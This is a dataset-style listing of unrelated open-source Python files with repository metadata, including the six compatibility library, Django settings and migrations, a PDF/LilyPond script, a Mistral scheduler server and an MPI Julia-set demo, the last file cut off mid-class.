| text (string, lengths 6-947k) | repo_name (string, lengths 5-100) | path (string, lengths 4-231) | language (string, 1 class) | license (string, 15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) |
---|---|---|---|---|---|---|
"""Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.2.0"
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
text_type_name = text_type().__class__.__name__
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems("moves")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_code = "func_code"
_func_defaults = "func_defaults"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
if PY3:
def get_unbound_function(unbound):
return unbound
Iterator = object
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
else:
def get_unbound_function(unbound):
return unbound.im_func
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
def iterkeys(d):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)())
def itervalues(d):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)())
def iteritems(d):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)())
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
def compat_repr(object_repr):
return object_repr
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
def compat_repr(object_repr):
# compat_repr is designed to return all reprs with leading 'u's
# inserted to make all strings look like unicode strings.
# This makes testing between py2 and py3 much easier.
result = ''
in_quote = False
curr_quote = None
for char in object_repr:
if char in ['"', "'"] and (
not curr_quote or char == curr_quote):
if in_quote:
# Closing quote
curr_quote = None
in_quote = False
else:
# Opening quote
curr_quote = char
result += 'u'
in_quote = True
result += char
return result
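# Illustrative example (added for clarity, not part of the original source):
# on Python 2, compat_repr("['a', 'b']") returns "[u'a', u'b']".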
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
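# Illustrative usage (assumed, not part of the original module): given some
# metaclass ``Meta``, a class that works on both Python 2 and 3 can be
# declared as:
#   class MyClass(with_metaclass(Meta, object)):
#       pass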
| GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/sure/six.py | Python | agpl-3.0 | 12,755 | 0.001803 |
import subprocess
from music21 import *
from pyPdf import PdfFileReader, PdfFileWriter
from reportlab.pdfgen import canvas
from reportlab.lib import pagesizes
from reportlab.lib.units import inch
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
# some important constants
MUSIC_XML_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\music-xml\\"
MUSIC_LY_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\music-ly\\"
MUSIC_PDF_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\music-pdf\\"
PAGENUM_PDF_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\pagenum-pdf\\"
PAGE_PDF_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\page-pdf\\"
OUTPUT_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\pdf-output\\"
PATH_TO_CAMBRIA = "C:\\Windows\\Fonts\\CAMBRIA.TTC"
LILYPOND_EXE_LOCATION = r"c:\Program Files (x86)\lilypond\usr\bin\lilypond.exe"
for i in range(-1, 43 + 1):
pageNum = i
pageNumber = str(pageNum)
numOfParts = 1
# generate .ly file in music21
music = converter.parse(MUSIC_XML_DIR + pageNumber + ".xml")
numOfParts = len(music.getElementsByClass(stream.Part))
music.write("lily", MUSIC_LY_DIR + pageNumber + ".ly")
# add styling information to .ly file
outFile = open(MUSIC_LY_DIR + pageNumber + ".ly", "a") # 'a' opens for appending
if numOfParts == 1:
outFile.write(file("ly-one-line.txt","r").read()) # 'r' opens for just reading
else:
outFile.write(file("ly-two-lines.txt","r").read()) # 'r' opens for just reading
outFile.close()
# turn .ly into .pdf
subprocess.call([ #will wait for finish exec
LILYPOND_EXE_LOCATION,
"-o", MUSIC_PDF_DIR,
MUSIC_LY_DIR + pageNumber + ".ly"
])
# merge pages and add page number:
musicLine = PdfFileReader(file(MUSIC_PDF_DIR + pageNumber + ".pdf", "rb"))
page = PdfFileReader(file(PAGE_PDF_DIR + pageNumber + ".pdf", "rb"))
page.getPage(0).mergePage(musicLine.getPage(0))
hexPageNumber = str(hex(pageNum))[2:].upper()
pageNumberPdfCanvas = canvas.Canvas(PAGENUM_PDF_DIR + pageNumber + ".pdf", pagesize=pagesizes.letter)
pdfmetrics.registerFont(TTFont("Cambria", PATH_TO_CAMBRIA))
pageNumberPdfCanvas.setFont("Cambria", 12)
if pageNum != -1: # title page is -1, and we don't want a page number there.
if pageNum % 2 == 0: # even pages are on left, so put text on right
widthOfText = pageNumberPdfCanvas.stringWidth(hexPageNumber, "Cambria", 12)
pageNumberPdfCanvas.drawString(inch * 8.5 - inch * .5 - widthOfText, inch * 11 - inch * .5, hexPageNumber)
else: # put number on left
pageNumberPdfCanvas.drawString(inch * .5, inch * 11 - inch * .5, hexPageNumber)
pageNumberPdfCanvas.showPage()
pageNumberPdfCanvas.save()
pageNumberPdf = PdfFileReader(file(PAGENUM_PDF_DIR + pageNumber + ".pdf", "rb"))
page.getPage(0).mergePage(pageNumberPdf.getPage(0))
output = PdfFileWriter()
output.addPage(page.getPage(0))
outStream = file(OUTPUT_DIR + pageNumber + ".pdf", "wb")
output.write(outStream)
outStream.close()
| SyntaxBlitz/syntaxblitz.github.io | portfolio/pdf-scripts/do-page-generate.py | Python | mit | 3,014 | 0.023557 |
# -*- coding: utf-8 -*-
import json
from axe.http_exceptions import BadJSON
def get_request(request):
return request
def get_query(request):
return request.args
def get_form(request):
return request.form
def get_body(request):
return request.data
def get_headers(request):
return request.headers
def get_cookies(request):
return request.cookies
def get_method(request):
return request.method
def get_json(headers, body):
content_type = headers.get('Content-Type')
if content_type != 'application/json':
return
data = body.decode('utf8')
try:
return json.loads(data)
except ValueError:
raise BadJSON
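# Illustrative composition (assumed, not part of the original module):
#   payload = get_json(get_headers(request), get_body(request))
# returns None when the Content-Type is not application/json and raises
# BadJSON when the body is not valid JSON.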
| soasme/axe | axe/default_exts.py | Python | mit | 680 | 0.011765 |
from protocols.forms import forms
from core.utils import TIME_UNITS
class DiscardForm(forms.VerbForm):
name = "Discard"
slug = "discard"
has_manual = True
layers = ['item_to_act','item_to_retain','conditional_statement','settify']
item_to_act = forms.CharField(required=False, label='item to discard')
item_to_retain = forms.CharField()
conditional_statement = forms.CharField(required = False, help_text ='if X happens, do Y')
min_time = forms.FloatField(required=False, help_text='this is the minimal time this should take', widget=forms.NumberInput(attrs={'step':'any'}))
max_time = forms.FloatField(required=False, widget=forms.NumberInput(attrs={'step':'any'}))
time_units = forms.ChoiceField(required=False, choices=TIME_UNITS, help_text='in seconds', initial = 'sec' )
time_comment = forms.CharField(required=False)
| Bionetbook/bionetbook | bnbapp/protocols/forms/verbs/discard.py | Python | mit | 870 | 0.018391 |
##############################################################################
# Copyright (c) 2000-2016 Ericsson Telecom AB
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Balasko, Jeno
# Delic, Adam
#
##############################################################################
import xml.etree.ElementTree as ET
tree = ET.parse('project_hierarchy_graph.xml')
root = tree.getroot()
f = open('project_hierarchy_graph.dot', 'w')
f.write("digraph PROJECT_HIERARCHY_GRAPH {\n")
for project in root:
for reference in project:
f.write(project.attrib['name'])
f.write(" -> ")
f.write(reference.attrib['name'])
f.write(";\n")
f.write("}\n")
f.close()
# use this to generate graph:
# > dot -Tpng project_hierarchy_graph.dot -o project_hierarchy_graph.png
| BenceJanosSzabo/titan.core | etc/scripts/tpd_graph_xml2dot.py | Python | epl-1.0 | 978 | 0.005112 |
# Copyright 2018 - Nokia Networks.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_log import log as logging
from mistral.rpc import base as rpc
from mistral.service import base as service_base
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class SchedulerServer(service_base.MistralService):
"""Scheduler server.
Manages scheduler life-cycle and gets registered as an RPC
endpoint to process scheduler specific calls.
"""
def __init__(self, scheduler, setup_profiler=True):
super(SchedulerServer, self).__init__(
'scheduler_group',
setup_profiler
)
self.scheduler = scheduler
self._rpc_server = None
def start(self):
super(SchedulerServer, self).start()
self._rpc_server = rpc.get_rpc_server_driver()(cfg.CONF.engine)
self._rpc_server.register_endpoint(self)
self._rpc_server.run()
self._notify_started('Scheduler server started.')
def stop(self, graceful=False):
super(SchedulerServer, self).stop()
if self._rpc_server:
self._rpc_server.stop(graceful)
def schedule(self, rpc_ctx, job):
"""Receives requests over RPC to schedule delayed calls.
:param rpc_ctx: RPC request context.
:param job: Scheduler job.
"""
LOG.info("Received RPC request 'schedule'[job=%s]", job)
return self.scheduler.schedule(job, allow_redistribute=False)
| openstack/mistral | mistral/scheduler/scheduler_server.py | Python | apache-2.0 | 2,019 | 0 |
class Foo(object):
def mm(self, barparam):
'''
@param barparam: this is barparam
'''
f = Foo()
f.mm(barparam=10)
| aptana/Pydev | tests/com.python.pydev.refactoring.tests/src/pysrcrefactoring/reflib/renameparameter/methoddef2.py | Python | epl-1.0 | 145 | 0.006897 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.datetime_safe
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('topics', '0014_auto_20151218_1820'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('text', models.TextField()),
('slug', models.TextField(unique=True)),
('pub_date', models.DateTimeField(default=django.utils.datetime_safe.datetime.now, verbose_name='date published')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),
],
),
migrations.RemoveField(
model_name='tags',
name='user',
),
migrations.AlterField(
model_name='link',
name='tags',
field=models.ManyToManyField(to='topics.Tag'),
),
migrations.DeleteModel(
name='Tags',
),
]
| andychase/codebook | topics/migrations/0015_auto_20151218_1823.py | Python | mit | 1,259 | 0.002383 |
# Django settings for dss project.
import os
import mimetypes
from django.core.urlresolvers import reverse_lazy
import djcelery
from django.conf import global_settings
from dss import logsettings
from utils import here
from localsettings import *
from pipelinesettings import *
from storagesettings import *
from paymentsettings import *
DEVELOPMENT = DEBUG
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Fergal Moran', 'fergal.moran@gmail.com'),
)
MANAGERS = ADMINS
AUTH_PROFILE_MODULE = 'spa.UserProfile'
ALLOWED_HOSTS = ['*']
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'deepsouthsounds',
'ADMINUSER': 'postgres',
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
'HOST': DATABASE_HOST,
}
}
import sys
if 'test' in sys.argv or 'test_coverage' in sys.argv:
print "Testing"
DATABASES['default']['ENGINE'] = 'django.db.backends.sqlite3'
ROOT_URLCONF = 'dss.urls'
TIME_ZONE = 'Europe/Dublin'
LANGUAGE_CODE = 'en-ie'
SITE_ID = 1
USE_I18N = False
USE_L10N = True
s = True
SITE_ROOT = here('')
ADMIN_MEDIA_PREFIX = STATIC_URL + "grappelli/"
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
'pipeline.finders.PipelineFinder',
'pipeline.finders.CachedFileFinder',
)
STATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'
STATICFILES_DIRS = (
here('static'),
)
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
'django_facebook.context_processors.facebook',
'django.core.context_processors.request',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.contrib.auth.context_processors.auth',
"allauth.socialaccount.context_processors.socialaccount",
"allauth.account.context_processors.account",
"spa.context_processors.dss_context"
)
AUTHENTICATION_BACKENDS = global_settings.AUTHENTICATION_BACKENDS + (
"allauth.account.auth_backends.AuthenticationBackend",
)
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'user_sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'spa.middleware.cors.XsSharingMiddleware',
# 'htmlmin.middleware.HtmlMinifyMiddleware',
#'htmlmin.middleware.MarkRequestMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
'pipeline.middleware.MinifyHTMLMiddleware',
# 'spa.middleware.uploadify.SWFUploadMiddleware',
#'spa.middleware.sqlprinter.SqlPrintingMiddleware' if DEBUG else None,
#'debug_toolbar.middleware.DebugToolbarMiddleware',
)
WSGI_APPLICATION = 'dss.wsgi.application'
TEMPLATE_DIRS = (here('templates'),)
INSTALLED_APPS = (
'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'user_sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admindocs',
'django_facebook',
'django_extensions',
'django_gravatar',
'notification',
'djcelery',
'django_nose',
'sorl.thumbnail',
'south',
'pipeline',
'avatar',
'spa',
'spa.signals',
'core',
'dirtyfields',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.twitter',
'allauth.socialaccount.providers.google',
'debug_toolbar',
'django_jenkins',
'dbbackup',
'schedule',
'djrill',
'paypal.standard.ipn',
'django_user_agents',
'storages',
'rest_framework',
)
# where to redirect users to after logging in
LOGIN_REDIRECT_URL = reverse_lazy('home')
LOGOUT_URL = reverse_lazy('home')
LOGGING = logsettings.LOGGING
FACEBOOK_APP_ID = '154504534677009'
djcelery.setup_loader()
SOCIALACCOUNT_AVATAR_SUPPORT = True
SOCIALACCOUNT_PROVIDERS = {
'facebook': {
'SCOPE': ['email', 'publish_stream', 'publish_actions'],
'METHOD': 'oauth2',
'LOCALE_FUNC': lambda request: 'en_IE'
},
'google': {
'SCOPE': ['https://www.googleapis.com/auth/userinfo.profile'],
'AUTH_PARAMS': {'access_type': 'online'}
}
}
AVATAR_STORAGE_DIR = MEDIA_ROOT + '/avatars/'
ACCOUNT_LOGOUT_REDIRECT_URL = '/'
INTERNAL_IPS = ('127.0.0.1', '86.44.166.21', '192.168.1.111')
TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
TASTYPIE_ALLOW_MISSING_SLASH = True
SENDFILE_ROOT = os.path.join(MEDIA_ROOT, 'mixes')
SENDFILE_URL = '/media/mixes'
SESSION_ENGINE = 'user_sessions.backends.db'
mimetypes.add_type("text/xml", ".plist", False)
HTML_MINIFY = not DEBUG
DEFAULT_FROM_EMAIL = 'DSS ChatBot <chatbot@deepsouthsounds.com>'
DEFAULT_HTTP_PROTOCOL = 'http'
EMAIL_BACKEND = 'djrill.mail.backends.djrill.DjrillBackend'
if DEBUG:
import mimetypes
mimetypes.add_type("image/png", ".png", True)
mimetypes.add_type("image/png", ".png", True)
mimetypes.add_type("application/x-font-woff", ".woff", True)
mimetypes.add_type("application/vnd.ms-fontobject", ".eot", True)
mimetypes.add_type("font/ttf", ".ttf", True)
mimetypes.add_type("font/otf", ".otf", True)
REALTIME_HEADERS = {
'content-type': 'application/json'
}
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
if 'test' in sys.argv:
try:
from test_settings import *
except ImportError:
pass
REST_FRAMEWORK = {
# Use hyperlinked styles by default.
# Only used if the `serializer_class` attribute is not set on a view.
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.HyperlinkedModelSerializer',
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
#Trying this to see if it stops the user being logged out
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2 # Age of cookie, in seconds (default: 2 weeks).
| fergalmoran/dss | dss/settings.py | Python | bsd-2-clause | 6,629 | 0.000905 |
#!/usr/bin/python
import os,sys,json,re
for dirpath,dirnames,filenames in os.walk("data/courts/us"):
indexPath = os.path.join(dirpath,"index.txt")
if not os.path.exists(indexPath):
print "Oops: %s" % indexPath
sys.exit()
fh = open(indexPath)
lines = []
template = None
firstContent = False
while 1:
line = fh.readline()
if not line: break
if line.find(':category-id:') > -1: continue
if line.find(':court-id:') > -1: continue
line = line.rstrip()
if not firstContent:
if not line: continue
firstContent = True
if line.startswith('.. category:: '):
template = ' :category-id: %s'
elif line.startswith('.. court:: '):
template = ' :court-id: %s'
lines.append(line)
fh.close()
if not template:
print "Ouch: %s" % indexPath
sys.exit()
id = ';'.join(dirpath.split("/")[2:])
lines = lines[0:1] + [template % id] + lines[1:]
txt = "\n".join(lines) + "\n"
print txt
#open(indexPath, "w+").write(txt)
| fbennett/legal-resource-registry | attic/WALK-FILES.py | Python | bsd-2-clause | 1,115 | 0.011659 |
#! /usr/bin/env python
from pySecDec.loop_integral import loop_package
import pySecDec as psd
li = psd.loop_integral.LoopIntegralFromPropagators(
propagators = ['k1**2-msq','(k1+p1+p2)**2-msq','k2**2-msq','(k2+p1+p2)**2-msq','(k1+p1)**2-msq','(k1-k2)**2','(k2-p3)**2-msq','(k2+p1)**2','(k1-p3)**2'],
powerlist = [1,1,0,1,1,1,1,0,0],
loop_momenta = ['k1','k2'],
replacement_rules = [
('p1*p1',0),
('p2*p2',0),
('p3*p3',0),
('p1*p2','s/2'),
('p2*p3','pp4/2-s/2-t/2'),
('p1*p3','t/2')
]
)
Mandelstam_symbols = ['s','t','pp4']
mass_symbols = ['msq']
loop_package(
name = 'elliptic2L_physical',
loop_integral = li,
real_parameters = Mandelstam_symbols + mass_symbols,
#additional_prefactor = '(s/msq)**(3/2)',
# the highest order of the final epsilon expansion --> change this value to whatever you think is appropriate
requested_order = 0,
# the optimization level to use in FORM (can be 0, 1, 2, 3, 4)
form_optimization_level = 2,
# the WorkSpace parameter for FORM
form_work_space = '100M',
# the method to be used for the sector decomposition
# valid values are ``iterative`` and ``geometric``
decomposition_method = 'iterative',
# if you choose ``geometric`` and 'normaliz' is not in your
# $PATH, you can set the path to the 'normaliz' command-line
# executable here
#normaliz_executable='/path/to/normaliz',
contour_deformation = True
)
| mppmu/secdec | examples/elliptic2L_physical/generate_elliptic2L_physical.py | Python | gpl-3.0 | 1,518 | 0.049407 |
"""
# create a virtualenv
mkvirtualenv test_api
# install dependencies
pip install flask
pip install flasgger
# run the following script
python simple_test.py
"""
from flask import Flask, jsonify, request
from flasgger import Swagger
app = Flask(__name__)
Swagger(app)
@app.route("/recs", methods=['GET'])
def recs():
"""
A simple test API
This endpoint does nothing
Only returns "test"
---
tags:
- testapi
parameters:
- name: size
in: query
type: string
description: size of elements
responses:
200:
description: A single user item
schema:
id: return_test
properties:
result:
type: string
description: The test
default: 'test'
"""
size = int(request.args.get('size', 1))
return jsonify({"result": "test" * size})
app.run(debug=True)
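# Illustrative check (assumed, not part of the original sample): with the
# server running, GET /recs?size=3 returns {"result": "testtesttest"}, and
# flasgger typically serves the generated Swagger UI under /apidocs/.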
| Navisite/flasgger | flasgger/simple_test.py | Python | mit | 916 | 0.001092 |
import sys
import time
from mpi4py.futures import MPICommExecutor
x0 = -2.0
x1 = +2.0
y0 = -1.5
y1 = +1.5
w = 1600
h = 1200
dx = (x1 - x0) / w
dy = (y1 - y0) / h
def julia(x, y):
c = complex(0, 0.65)
z = complex(x, y)
n = 255
while abs(z) < 3 and n > 1:
z = z**2 + c
n -= 1
return n
def julia_line(k):
line = bytearray(w)
y = y1 - k * dy
for j in range(w):
x = x0 + j * dx
line[j] = julia(x, y)
return line
def plot(image):
import warnings
warnings.simplefilter('ignore', UserWarning)
try:
from matplotlib import pyplot as plt
except ImportError:
return
plt.figure()
plt.imshow(image, aspect='equal', cmap='cubehelix')
plt.axis('off')
try:
plt.draw()
plt.pause(2)
except:
pass
def test_julia():
with MPICommExecutor() as executor:
if executor is None: return # worker process
tic = time.time()
image = list(executor.map(julia_line, range(h), chunksize=10))
toc = time.time()
print("%s Set %dx%d in %.2f seconds." % ('Julia', w, h, toc-tic))
if len(sys.argv) > 1 and sys.argv[1] == '-plot':
plot(image)
if __name__ == '__main__':
test_julia()
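# Illustrative invocation (assumed): this demo is normally launched under MPI,
# e.g. ``mpiexec -n 4 python run_julia.py``; rank 0 acts as the master inside
# MPICommExecutor() while the remaining ranks evaluate julia_line() tasks.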
| mpi4py/mpi4py | demo/futures/run_julia.py | Python | bsd-2-clause | 1,252 | 0.00639 |
from uuid import uuid4
from django.contrib.admin.sites import AdminSite
from django.contrib.auth.models import User, Group
from django.test import RequestFactory
from txtalert.core.clinic_admin import VisitAdmin, PatientAdmin
from txtalert.core.models import Visit, Clinic, Patient
from txtalert.core.tests.base import BaseTxtAlertTestCase
class ClinicAdminTestCase(BaseTxtAlertTestCase):
model_class = None
model_admin_class = None
